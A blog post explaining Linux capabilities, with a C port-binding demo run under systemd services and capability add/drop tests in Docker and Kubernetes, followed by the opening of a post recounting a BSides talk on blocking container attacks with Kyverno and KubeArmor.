<h2 id="heading-what-are-linux-capabilities-really">What Are Linux Capabilities, Really?</h2>
<p>Before Linux had capabilities, privilege was binary: you were either <code>root</code> (UID 0) and could do everything. Otherwise you weren’t, and got <code>EPERM.</code> Every privileged syscall like <code>mount()</code>, <code>ptrace()</code>, or <code>chown()</code> used a hardcoded check. Capabilities don’t prevent a process from making a syscall, but they do decide whether the kernel <em>allows it to succeed</em>.</p>
<h3 id="heading-deep-dive">Deep Dive</h3>
<p>In pre-capabilities Linux (like <a target="_blank" href="https://elixir.bootlin.com/linux/2.0.40/source/kernel/sys.c#L292-L305">2.0.40</a>), the logic behind privileged syscalls like <code>setgid()</code> was straightforward. In this model, if you weren’t root, you could only change your effective group ID to match your real or saved group. Anything else returned a good old-fashioned <code>-EPERM</code>.</p>
<pre><code class="lang-c"><span class="hljs-function">asmlinkage <span class="hljs-keyword">int</span> <span class="hljs-title">sys_setgid</span><span class="hljs-params">(<span class="hljs-keyword">gid_t</span> gid)</span>
</span>{
    <span class="hljs-keyword">int</span> old_egid = current-&gt;egid;

    <span class="hljs-keyword">if</span> (suser())
        current-&gt;gid = current-&gt;egid = current-&gt;sgid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((gid == current-&gt;gid) || (gid == current-&gt;sgid))
        current-&gt;egid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span>
        <span class="hljs-keyword">return</span> -EPERM;
    <span class="hljs-keyword">if</span> (current-&gt;egid != old_egid)
        current-&gt;dumpable = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>So if you were root, you could change your group IDs freely. If not, you could only change your effective group ID to match your real or saved group. Otherwise? You got a good old-fashioned <code>-EPERM</code>.</p>
<p>Fast forward to <a target="_blank" href="https://elixir.bootlin.com/linux/2.2.24/source/kernel/sys.c#L292-L306">2.2.24</a> and it is still simple, but just drops super user for capabilities:</p>
<pre><code class="lang-c"><span class="hljs-function">asmlinkage <span class="hljs-keyword">int</span> <span class="hljs-title">sys_setgid</span><span class="hljs-params">(<span class="hljs-keyword">gid_t</span> gid)</span>
</span>{
    <span class="hljs-keyword">int</span> old_egid = current-&gt;egid;

    <span class="hljs-keyword">if</span> (capable(CAP_SETGID))
        current-&gt;gid = current-&gt;egid = current-&gt;sgid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((gid == current-&gt;gid) || (gid == current-&gt;sgid))
        current-&gt;egid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span>
        <span class="hljs-keyword">return</span> -EPERM;

    <span class="hljs-keyword">if</span> (current-&gt;egid != old_egid)
        current-&gt;dumpable = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Fast forward to the <a target="_blank" href="https://elixir.bootlin.com/linux/v6.16/source/kernel/sys.c">newest version</a> and it gets more complicated, so we'll avoid that.</p>
<h3 id="heading-the-root-problem">The Root Problem</h3>
<p>The old model had no concept of “just enough privilege.” If you wanted to let a program:</p>
<ul>
<li>Bind to a port below 1024 (<code>bind()</code>)</li>
<li>Run <code>ping</code> (requires raw socket access)</li>
<li>Trace another process (<code>ptrace()</code>)</li>
</ul>
<p>You had to give it full root, which meant total control over the system. Not ideal.</p>
<h3 id="heading-available-capabilities">Available Capabilities</h3>
<p>There are currently 41 capabilities in Linux defined in two sources:</p>
<ul>
<li><a target="_blank" href="https://man7.org/linux/man-pages/man7/capabilities.7.html"><code>man 7 capabilities</code></a> - human-readable descriptions</li>
<li><a target="_blank" href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/capability.h"><code>include/uapi/linux/capability.h</code></a> - actual definitions in the kernel</li>
</ul>
<p>Example from the header file:</p>
<pre><code class="lang-c"><span class="hljs-comment">/* Allow ioperm/iopl access */</span>
<span class="hljs-comment">/* Allow sending USB messages to any device via /dev/bus/usb */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_RAWIO        17</span>

<span class="hljs-comment">/* Allow use of chroot() */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_CHROOT       18</span>

<span class="hljs-comment">/* Allow ptrace() of any process */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_PTRACE       19</span>
</code></pre>
<p>These header definitions are used throughout the kernel wherever permission checks are needed. You’ll see them pop up in everything from <code>mount()</code> to <code>chroot()</code>. </p>
<h3 id="heading-more-than-just-on-or-off">More Than Just On or Off</h3>
<p>Capabilities aren’t just a binary “has it / doesn’t have it.”  When a process runs, the kernel keeps several <strong>capability sets</strong> that define not only what’s possible, but what’s actually in effect. This is a high level overview of what these are. </p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Set</td><td>What It Controls                                               </td></tr>
</thead>
<tbody>
<tr>
<td><strong>Permitted</strong></td><td>The menu of capabilities the process <em>may</em> make effective or inheritable.</td></tr>
<tr>
<td><strong>Effective</strong></td><td>The subset currently in use, what the process is actively wielding right now.</td></tr>
<tr>
<td><strong>Inheritable</strong></td><td>Capabilities the process can pass along to child processes during <code>execve()</code>.</td></tr>
<tr>
<td><strong>Bounding</strong></td><td>The hard ceiling, if it’s not here, it can never be granted later, even to root.</td></tr>
<tr>
<td><strong>Ambient</strong></td><td>Lets certain capabilities stick around across <code>execve()</code> for non-root processes.</td></tr>
</tbody>
</table>
</div><p>You can check a running process’s capabilities with:</p>
<pre><code class="lang-bash">grep Cap /proc/$$/status
</code></pre>
<p>For a friendlier view (with names instead of hex):</p>
<pre><code class="lang-bash">capsh --<span class="hljs-built_in">print</span>
</code></pre>
<hr />
<h2 id="heading-practical-example-with-capnetbindservice">Practical Example with <code>CAP_NET_BIND_SERVICE</code></h2>
<p>Let's walk through our capabilities with low port bindings. We'll try to set a service to bind to a port below 1024. Let's start with a simple C app that we'll call <code>bind_low_port</code>. This app will simply try to bind, not run anything persistent. Here is the app:</p>
<pre><code class="lang-c"><span class="hljs-comment">// bind_low_port.c</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;errno.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;netinet/in.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/socket.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
    <span class="hljs-keyword">int</span> sockfd;
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">sockaddr_in</span> <span class="hljs-title">addr</span>;</span>

    sockfd = socket(AF_INET, SOCK_STREAM, <span class="hljs-number">0</span>);
    <span class="hljs-keyword">if</span> (sockfd == <span class="hljs-number">-1</span>) {
        perror(<span class="hljs-string">"socket"</span>);
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }

    <span class="hljs-built_in">memset</span>(&amp;addr, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(<span class="hljs-number">80</span>); <span class="hljs-comment">// Privileged port (&lt;1024)</span>

    <span class="hljs-keyword">if</span> (bind(sockfd, (struct sockaddr *)&amp;addr, <span class="hljs-keyword">sizeof</span>(addr)) &lt; <span class="hljs-number">0</span>) {
        perror(<span class="hljs-string">"bind"</span>);
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Successfully bound to port 80\n"</span>);
    close(sockfd);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Go ahead and compile that and drop it into <code>/usr/local/bin</code>:</p>
<pre><code class="lang-sh">sudo gcc -o /usr/<span class="hljs-built_in">local</span>/bin/bind_low_port bind_low_port.c
sudo chmod +x /usr/<span class="hljs-built_in">local</span>/bin/bind_low_port bind_low_port.c
</code></pre>
<p>Now the app is ready to go!</p>
<h3 id="heading-run-as-root">Run as Root</h3>
<p>Now let's rewind to the pre-capabilities days. We need to make sure we are root to get this to work so let's create a service to run as root! Save the following as <code>bind-root.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 as root

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=root

[Install]
WantedBy=multi-user.target
</code></pre>
<p>Copy it into our <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-root.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-root.service
sudo systemctl status bind-root
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">○ bind-root.service - Bind to port 80 as root
     Loaded: loaded (/etc/systemd/system/bind-root.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:32:52 controlplane systemd[1]: Started bind-root.service - Bind to port 80 as root.
Aug 08 20:32:52 controlplane bind_low_port[2400223]: Successfully bound to port 80
Aug 08 20:32:52 controlplane systemd[1]: bind-root.service: Deactivated successfully.
</code></pre>
<p>Worked as expected, but not a desirable permission level.</p>
<h3 id="heading-run-with-net-bind-capability">Run with Net Bind Capability</h3>
<p>Now let's get to the capabilities world. We no longer need root! Save the following as a <code>bind-captest.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 with CAP_NET_BIND_SERVICE

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=captest
Group=captest
AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
NoNewPrivileges=<span class="hljs-literal">true</span>

[Install]
WantedBy=multi-user.target
</code></pre>
<p>We'll need to create this non-privileged user and group. </p>
<pre><code class="lang-bash">sudo groupadd --system captest
sudo useradd --system --no-create-home --gid captest captest
</code></pre>
<p>Copy it into your <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-captest.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-captest.service
sudo systemctl status bind-captest
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">○ bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE
     Loaded: loaded (/etc/systemd/system/bind-captest.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:21:13 controlplane systemd[1]: bind-captest.service: Failed with result <span class="hljs-string">'exit-code'</span>.
Aug 08 20:22:13 controlplane systemd[1]: Started bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE.
Aug 08 20:22:13 controlplane bind_low_port[2392163]: Successfully bound to port 80
Aug 08 20:22:13 controlplane systemd[1]: bind-captest.service: Deactivated successfully
</code></pre>
<p>Worked as expected and with least privilege. Not too bad.</p>
<h3 id="heading-run-with-no-root-and-no-capability">Run with No Root and No Capability</h3>
<p>Again we'll create a service. Save the following as <code>bind-nonroot.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 with no capabilities

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=captest
Group=captest
NoNewPrivileges=<span class="hljs-literal">true</span>

[Install]
WantedBy=multi-user.target
</code></pre>
<p>No need to create the user and group as we did that in the previous step. Copy it into our <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-nonroot.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-nonroot.service
sudo systemctl status bind-nonroot
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">× bind-nonroot.service - Bind to port 80 with no capabilities
     Loaded: loaded (/etc/systemd/system/bind-nonroot.service; disabled; preset: enabled)
     Active: failed (Result: exit-code) since Fri 2025-08-08 20:28:15 UTC; 11min ago
   Duration: 4ms
   Main PID: 2396701 (code=exited, status=1/FAILURE)
        CPU: 1ms

Aug 08 20:28:15 controlplane systemd[1]: Started bind-nonroot.service - Bind to port 80 with no capabilities.
Aug 08 20:28:15 controlplane bind_low_port[2396701]: <span class="hljs-built_in">bind</span>: Permission denied
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Main process exited, code=exited, status=1/FAILURE
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Failed with result <span class="hljs-string">'exit-code'</span>.
</code></pre>
<p>Failed just as expected. </p>
<p>So we hit the <em>trifecta</em>. No bonus payout, sadly. Here is a quick recap:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Service Type</td><td>Can Bind Port 80?</td><td>Privilege Level</td><td>Notes</td></tr>
</thead>
<tbody>
<tr>
<td>Root</td><td>Yes</td><td>Full root</td><td>Risky: has all powers</td></tr>
<tr>
<td>Non-root + Capability</td><td>Yes</td><td>Scoped via <code>CAP_NET_BIND_SERVICE</code></td><td>Just enough privilege</td></tr>
<tr>
<td>Non-root, No Capability</td><td>No</td><td>No elevated privileges</td><td>Expected failure (Permission denied)</td></tr>
</tbody>
</table>
</div><p>Now that we've laid the groundwork, let's dive into something near and dear.</p>
<hr />
<h2 id="heading-capabilities-in-container-land">Capabilities in Container Land</h2>
<h3 id="heading-docker-containers">Docker Containers</h3>
<p>By default, Docker containers run with a reduced set of <a target="_blank" href="https://docs.docker.com/engine/security/#linux-kernel-capabilities">capabilities</a>, but not empty. Let's create a simple Dockerfile that gives us some tools.</p>
<pre><code class="lang-Dockerfile"><span class="hljs-keyword">FROM</span> ubuntu:<span class="hljs-number">22.04</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt update &amp;&amp; apt install -y \
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean</span>
</code></pre>
<p>Then create and run in interactive mode:</p>
<pre><code class="lang-bash">docker build -t captest .
docker run --rm -it captest
</code></pre>
<p>Now let's check our capabilities.</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># capsh --print</span>
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1<span class="hljs-string">'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)</span>
</code></pre>
<p>You’ll see things like <code>CAP_NET_BIND_SERVICE</code>, <code>CAP_CHOWN</code>, and <code>CAP_DAC_OVERRIDE</code> still available.</p>
<p>Test something allowed such as <code>CAP_CHOWN</code>:</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># touch testfile &amp;&amp; chown nobody:nogroup testfile &amp;&amp; ls</span>
bin  boot  dev  etc  home  lib  media  mnt  opt  proc  root  run  sbin  secret  srv  sys  testfile  tmp  usr  var
</code></pre>
<p>Test something not allowed such as <code>CAP_NET_ADMIN</code>:</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># ip link add dummy0 type dummy</span>
RTNETLINK answers: Operation not permitted
</code></pre>
<p>Exit the container and we can try to drop and add a capability.</p>
<pre><code class="lang-bash">docker run --rm -it --cap-drop=CHOWN --cap-add=CAP_NET_ADMIN captest
</code></pre>
<p>And now the capabilities have switched:</p>
<pre><code class="lang-bash">root@2d6de2b45347:/<span class="hljs-comment"># touch file</span>
root@2d6de2b45347:/<span class="hljs-comment"># chown nobody file</span>
chown: changing ownership of <span class="hljs-string">'file'</span>: Operation not permitted
root@54e336fcd322:/<span class="hljs-comment"># ip link add dummy0 type dummy</span>
root@54e336fcd322:/<span class="hljs-comment">#</span>
</code></pre>
<p>That all worked as expected. We've seen the defaults and shown how to add and drop capabilities. </p>
<h3 id="heading-kubernetes-pods">Kubernetes Pods</h3>
<p>Let's try the same thing in <a target="_blank" href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container">Kubernetes</a>. Create the following pod definition:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cap-default</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cap-default</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"infinity"</span>]
</code></pre>
<p>Deploy the pod and exec in:</p>
<pre><code class="lang-bash">kubectl apply -f captest-pod.yaml
kubectl <span class="hljs-built_in">exec</span> -it cap-default -- /bin/bash
</code></pre>
<p>Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment:</p>
<pre><code class="lang-bash">root@cap-default:/<span class="hljs-comment"># apt update &amp;&amp; apt install -y \</span>
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean
root@cap-default:/<span class="hljs-comment"># capsh --print</span>
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1<span class="hljs-string">'b0 (no-new-privs=0)
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: HYBRID (4)</span>
</code></pre>
<p>Now let's change the pod definition to add and drop capabilities. Here is our new definition:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cap-custom</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cap-custom</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"infinity"</span>]
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">capabilities:</span>
        <span class="hljs-attr">drop:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">CHOWN</span>
        <span class="hljs-attr">add:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">NET_ADMIN</span>
</code></pre>
<p>Deploy the pod and exec in:</p>
<pre><code class="lang-bash">kubectl apply -f cap-custom.yaml
kubectl <span class="hljs-built_in">exec</span> -it cap-custom -- /bin/bash
</code></pre>
<p>Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment (you might see a lot of errors due to dropping <code>CAP_CHOWN</code>:</p>
<pre><code class="lang-bash">root@cap-custom:/<span class="hljs-comment"># apt update &amp;&amp; apt install -y \</span>
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean
root@cap-custom:/<span class="hljs-comment"># capsh --print</span>
Current: cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_chown,!cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1<span class="hljs-string">'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)</span>
</code></pre>
<p>Our quick tests showed the same rule applies whether you’re running a straight Docker container or running in Kubernetes:  </p>
<ul>
<li><strong>In Docker</strong>, a container running as root starts with a limited set of default capabilities. We proved that if a capability like <code>CAP_NET_ADMIN</code> isn’t present, privileged operations (e.g., <code>ip link add</code>) fail with <code>Operation not permitted</code>.  </li>
<li><strong>In Kubernetes</strong>, the <code>securityContext</code> gives you fine-grained control. You can:<ul>
<li><strong>Drop</strong> capabilities you don’t want (e.g., <code>CAP_CHOWN</code>) to shrink the attack surface, even for root.</li>
<li><strong>Add</strong> specific capabilities (e.g., <code>CAP_NET_ADMIN</code>) to grant only what’s needed without giving the Pod full root privileges.</li>
</ul>
</li>
</ul>
<p>Capabilities are your surgical tool for granting <em>just enough privilege</em>, whether that’s binding to a low port, tweaking networking, or blocking risky syscalls. </p>
<hr />
<h2 id="heading-final-thoughts-why-capabilities-matter">Final Thoughts: Why Capabilities Matter</h2>
<p>From the early days of Linux, privilege was an all-or-nothing deal, UID 0 could do everything, everyone else got <code>EPERM</code>.  That simplicity came at a cost: giving a process one privileged action meant giving it <em>all</em> of them.</p>
<p>Linux 2.2’s introduction of <strong>capabilities</strong> changed that. Privilege could now be split into fine-grained units like <code>CAP_NET_BIND_SERVICE</code> or <code>CAP_SYS_PTRACE</code>, tied directly to specific syscalls. Our NET_BIND example showed how this plays out in practice:</p>
<ul>
<li><strong>Root-only service</strong>: Works, but comes with every privilege.</li>
<li><strong>Capability-only service</strong>: Works for the intended action (binding port 80) without extra power.</li>
<li><strong>No capability</strong>: Fails as expected.</li>
</ul>
<p>When we moved into containers, the same principle held:<br />Docker and Kubernetes both start with a reduced set of capabilities for root, and both let you <em>add</em> or <em>drop</em> individual privileges. Our tests showed:</p>
<ul>
<li>Dropping <code>CAP_CHOWN</code> removes the ability to change file ownership, even for root.</li>
<li>Without <code>CAP_NET_ADMIN</code>, network device management fails with <code>Operation not permitted</code>.</li>
<li>Adding just the required capability restores the intended function without re-granting full root.</li>
</ul>
<p><strong>The takeaway:</strong> capabilities are one of the cleanest ways to shrink your attack surface without breaking legit workloads. I think of them as a firewall for syscalls. You can allow only what you need, block everything else, and never give away more than necessary.</p>
]]></content:encoded></item><item><title><![CDATA[When YAML Fights Back: My Runtime Security Talk at BSides]]></title><description><![CDATA[I gave a talk at BSides Las Vegas where we blocked a live threat right in the middle of a reverse shell attempt. With defense in depth of all things. Well, not live, but there were screencaps!
The talk focused on preventing attacks in Kubernetes usin...]]></description><link>https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides</link><guid isPermaLink="true">https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[Speakers]]></category><category><![CDATA[Bsides]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 06 Aug 2025 05:53:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1754459559611/877f28c2-3c99-4f0c-baf1-9030fbf29982.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>I gave a talk at BSides Las Vegas where we blocked a live threat right in the middle of a reverse shell attempt. With defense in depth of all things. Well, not live, but there were screencaps!</p>
<p>The talk focused on preventing attacks in Kubernetes using policy-as-code tools like Kyverno and KubeArmor. No “AI for runtime.” Just a vulnerable Flask app, an RCE payload, and enforcement policies that shut it down cold. </p>
<p>Here’s a quick look back at the process and experience of the talk. This is less about the content that you can grab <a target="_blank" href="https://github.com/sf-matt/k8s-enforcement-lab">here</a>. Ignore the excess commits to fix Markdown and other issues in the README.</p>
<blockquote>
<p>btw you can see it right at the beginning <a target="_blank" href="https://www.youtube.com/watch?v=6ZgnzCzz5gs">here</a></p>
</blockquote>
<hr />
<h2 id="heading-what-the-talk-covered">What the talk covered</h2>
<p>The core idea was simple: show how sad Kubernetes workloads can be blocked and then have the capability to squash the leftover bad behavior. All of this was done with open source tools anyone can try.</p>
<p>The scenario started with a deliberately vulnerable Flask app (very contrived, but I think interesting nonetheless), running in a misconfigured pod with:</p>
<ul>
<li>The root user inside the container</li>
<li>A NodePort service exposed</li>
<li>And a neat little OS command injection bug</li>
</ul>
<p>From there, I walked through a simulated attack chain:
Attacker hits the exposed app ➝ gains shell access ➝ attempts the usual container hackery.</p>
<p>But then we stopped it at two key stages:</p>
<ul>
<li>At admission: Kyverno blocked the insecure pod from even deploying if it ran as root. No, you don't...</li>
<li>At runtime: KubeArmor enforced syscall-level restrictions via LSMs.</li>
</ul>
<p>This wasn’t abstract. The talk was built around a live lab, with policies, manifests, and attack steps running in a real cluster. Don't judge the actual apps and manifests too harshly.</p>
<hr />
<h2 id="heading-the-prep">The Prep</h2>
<p>The prep took a hella long time, probably because I completely overthought it. Going through the CFP was actually lightning quick, I had it done in a few days. I submitted it with little expectation of being selected. But on a Friday I found out I was selected. Felt good for a bit until I realized I actually had to flesh out a talk and slides. </p>
<p>It was through BSides Proving Grounds, which provided me an opportunity to have a mentor. Jimmy Shah was totally awesome and encouraging. He never told me what to do, but rather helped me when I was a bit off. </p>
<p>Sequence of Events:</p>
<ul>
<li>Developed and submitted CFP in May</li>
<li>Finished slides (mostly) in June</li>
<li>Spent ages rehearsing and revising</li>
<li>Day before BSides did a dry run with a few folks and got great feedback on the last day (literally) </li>
</ul>
<p>No gambling the night before, just beer, of course.</p>
<hr />
<h2 id="heading-the-live-experience">The Live Experience</h2>
<p>This was the first time I delivered a self-crafted talk in a room of at least 30. I had spent days circulating the talk in my head. Trust me, I could hardly keep it from entering my dreams.</p>
<p>I spent quite a bit of time on this and went back and forth on a lot of things. But I think I came to something that worked at the end.</p>
<p>A few things stood out:</p>
<ul>
<li><p>You lose the nerves once you start talking. For the entire 25+ minutes (yes I was probably long) I felt fine, despite the occasional stumble and repetition.</p>
</li>
<li><p>I felt good because I believe the content is good and I did something right in my wheelhouse.</p>
</li>
<li><p>It wasn't the crowd that knew Kubernetes like the folks at KubeCon, but I think with my proper anchors it made sense (got this feedback from a few K8s amateurs).</p>
</li>
<li><p>It wasn't a cool talk, like those with awesome ways to make iPhones cool again, but I think it was just enough.</p>
</li>
</ul>
<hr />
<h2 id="heading-the-end">The End</h2>
